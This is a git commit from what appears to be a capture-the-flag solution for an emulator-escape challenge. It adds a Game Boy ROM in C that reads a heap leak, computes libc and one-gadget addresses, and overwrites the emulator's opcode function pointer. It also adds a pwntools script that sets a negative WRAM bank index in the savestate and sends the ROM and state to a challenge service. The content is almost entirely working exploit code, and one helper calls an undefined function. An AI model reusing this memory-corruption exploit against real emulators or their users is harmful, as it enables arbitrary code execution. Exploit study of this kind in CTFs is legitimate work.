commit 818a0be94c63c6ddfabe108ca49e2c26922fc130
Author: Louis Burda <quent.burda@gmail.com>
Date: Thu, 26 May 2022 02:57:04 +0200
Attempt via memory object
Diffstat:
A | .gitignore | | | 2 | ++ |
A | Makefile | | | 28 | ++++++++++++++++++++++++++++ |
A | main.c | | | 31 | +++++++++++++++++++++++++++++++ |
A | solve.py | | | 42 | ++++++++++++++++++++++++++++++++++++++++++ |
4 files changed, 103 insertions(+), 0 deletions(-)
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,2 @@
+main.gb
+main.state
diff --git a/Makefile b/Makefile
@@ -0,0 +1,28 @@
+LCC = ./gbdk/build/gbdk/bin/lcc
+SDCC = ./sdcc/bin/sdcc
+GEARBOY = ./gearboy/platforms/linux/gearboy
+
+.PHONY: all clean run
+
+all: main.gb
+
+clean:
+ rm -f main.gb
+
+$(SDCC):
+ @if [ ! -e Makefile ]; then \
+ cd sdcc && ./configure; \
+ fi
+ make -C sdcc
+
+$(LCC): $(SDCC)
+ SDCCDIR=$(PWD)/sdcc make -C gbdk
+
+main.gb: main.c $(LCC)
+ $(LCC) -o $@ -Wall $< -Wl-yp0x143=0x80
+
+$(GEARBOY):
+ make -C ./gearboy/platforms/linux
+
+run: $(GEARBOY) main.gb
+ $(GEARBOY) main.gb
diff --git a/main.c b/main.c
@@ -0,0 +1,31 @@
+#include "stdint.h"
+
+void
+main(void)
+{
+ volatile static void *memory;
+ volatile static void *processor;
+ volatile static uint64_t op0x00;
+ volatile static uint64_t libc;
+ volatile static uint64_t onegadget;
+ volatile static uint64_t ld_leak;
+
+ /* memory - wrambanks = 0x72840 */
+
+ /* WRAM BANK = -73 */
+ memory = (void*) 0xD7c0;
+
+ /* get leak from heap */
+ ld_leak = *(uint64_t*)(memory + 0x30);
+ libc = ld_leak + 0x127dff0;
+ onegadget = libc + 0xe3afe;
+
+ /* WRAM BANK -13 */
+ *(uint8_t*)(memory + 0x7c) = 0xf3; /* LSB */
+
+ //* ..with new bank, overwrite op 0x00 funcptr */
+ processor = (void*) 0xD960;
+ *(uint64_t*)(processor) = onegadget;
+
+ while (1);
+}
diff --git a/solve.py b/solve.py
@@ -0,0 +1,42 @@
+#!/usr/bin/env python3
+
+from base64 import b64encode
+from sys import argv,exit
+from pwn import *
+
+context.log_level = "error"
+
+def send(rom, state):
+ #io = process("ncat --ssl 8c83260abb62e95abcc3fdf7-gearboy.challenge.master.cscg.live 31337".split())
+ io = process("ncat localhost 1024".split())
+ io.sendline(b64encode(open(rom, "rb").read()))
+ io.sendline(b64encode(open(state, "rb").read()))
+ data = io.readuntil(b"Got EOF")
+ io.close()
+ return data
+
+def set_wrambanks(filename, index):
+ data = open(filename, "rb").read()
+ data = data[:0x1000] + struct.pack("<i", index) + data[0x1004:]
+ with open(filename, "wb+") as f:
+ f.write(data)
+
+def find_heap_start():
+ search_space = (-256, -90)
+ while search_space[0] + 1 != search_space[1]:
+ testval = (search_space[1] + search_space[0]) // 2
+ print(search_space)
+
+ set_modstate(testval)
+
+ data = send("main.gb", "main.state")
+ if b"exit code 139" in data:
+ search_space = (testval, search_space[1])
+ else:
+ search_space = (search_space[0], testval)
+
+ print("OFFSET", testval)
+
+set_wrambanks("main.gb", -0x37)
+
+print(send("main.gb", "main.state").decode())